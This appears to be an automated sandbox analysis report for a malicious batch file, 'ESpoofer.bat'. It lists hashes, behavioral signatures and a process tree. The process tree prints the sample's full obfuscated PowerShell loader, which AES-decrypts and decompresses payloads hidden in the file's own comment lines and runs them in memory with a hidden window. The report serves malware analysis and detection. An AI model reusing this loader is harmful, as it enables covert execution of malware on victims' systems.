Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
23-01-2025 19:09
Static task
static1
Behavioral task
behavioral1
Sample
ESpoofer.bat
Resource
win7-20240729-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
ESpoofer.bat
Resource
win10v2004-20241007-en
16 signatures
150 seconds
General
-
Target
ESpoofer.bat
-
Size
291KB
-
MD5
3726560b7e2b96b268c25f0e6ee93e87
-
SHA1
a80b2477598d41baca9b013df935750dc7fb35a8
-
SHA256
45613b094a63904db97d394d40574ccb60444990924fa9df1ed19dfc6d4da766
-
SHA512
7f81dd73d85f6fcf1210830f5259d22095037dce5613fc397a983a11c079cbf77c74e2464e8be461f2455354e08949c4a74439e8fc0cd2efff43ff7a034bf34a
-
SSDEEP
6144:4kQLbp6z5Ary1l3qgJDeKGImDRg1Y28MxBNQdyWCbY5pepzJhMfgS:4Np6lZn3qgJ/GXDR6ZfxBNKTCbjFsJ
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2328 powershell.exe -
Deletes itself 1 IoCs
pid Process 908 cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2328 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 908 wrote to memory of 2328 908 cmd.exe 30 PID 908 wrote to memory of 2328 908 cmd.exe 30 PID 908 wrote to memory of 2328 908 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ESpoofer.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ABSkg3c5RdTlVVO+LETYiwnY5IUi/Oxvvu/3j8Eh8LA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gpFC2eKYPgwT0m8KOwt5yA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BiwtT=New-Object System.IO.MemoryStream(,$param_var); $lwmkR=New-Object System.IO.MemoryStream; $GsgDc=New-Object System.IO.Compression.GZipStream($BiwtT, [IO.Compression.CompressionMode]::Decompress); $GsgDc.CopyTo($lwmkR); $GsgDc.Dispose(); $BiwtT.Dispose(); $lwmkR.Dispose(); $lwmkR.ToArray();}function execute_function($param_var,$param2_var){ $pSmqn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fxjIB=$pSmqn.EntryPoint; $fxjIB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ESpoofer.bat';$MmrVi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ESpoofer.bat').Split([Environment]::NewLine);foreach ($LjtcW in $MmrVi) { if ($LjtcW.StartsWith(':: ')) { $MhzlL=$LjtcW.Substring(3); break; }}$payloads_var=[string[]]$MhzlL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-